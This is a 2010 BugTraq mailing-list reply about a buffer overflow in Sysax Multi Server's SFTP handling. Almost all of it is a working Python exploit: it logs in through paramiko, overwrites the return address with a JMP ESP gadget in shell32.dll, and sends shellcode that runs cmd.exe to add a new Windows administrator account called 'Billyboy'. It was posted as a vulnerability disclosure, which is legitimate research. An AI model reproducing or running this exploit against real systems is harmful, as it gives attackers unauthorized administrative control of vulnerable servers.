BugTraq
Re: Sysax Multi Server "open", "unlink", "mkdir", "scp_get" Commands DoS Vulnerabilities Jun 26 2010 11:45PM
rob accensussecurity com
Assuming the server is running as admin the overflow can actually be used to execute arbitrary code. In our example we spawn an instance of cmd.exe and create a new admin, Billyboy, with a password of woot.

This has been tested with Windows XP SP2.

+-------- Start Exploit --------+

import paramiko

import sys

t_ip = "192.168.1.104" #target IP

t_port = 4019 #target port

password = "asdf" #Known user

username = "asdf" #password for user

transport = paramiko.Transport((t_ip, t_port))

transport.connect(username = username, password = password)

sftp = paramiko.SFTPClient.from_transport(transport)

sftp.chdir("./") #Execute a good command

buff_pen = "\x90" * 389

buff_pen += "\x65\x82\xa5\x7c" #Point EIP to JMP ESP command in shell32.dll

buff_pen += "\x90" * 3

buff_pen += "\xeb\x13\x5b\x31\xc0\x50\x53\xbb\x4d\x11\x86\x7c\xff\xd3\xbb\xa2\xca\x8
1\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x6
3\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x42\x69\x6c\x6c\x79\x62\x6f\x7
9\x20\x77\x6f\x6f\x74\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x2
0\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x7
3\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x45\x78\x70\x41\x6
4\x6d\x69\x6e\x00" #Shellcode to make a new admin, billyboy, with a password of 'woot'

buff_pen += "\x90" * 3

buff_pen += "\xcc" * (800 - len(buff_pen))

sftp.get(buff_pen)

+-------- Stop Exploit --------+

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus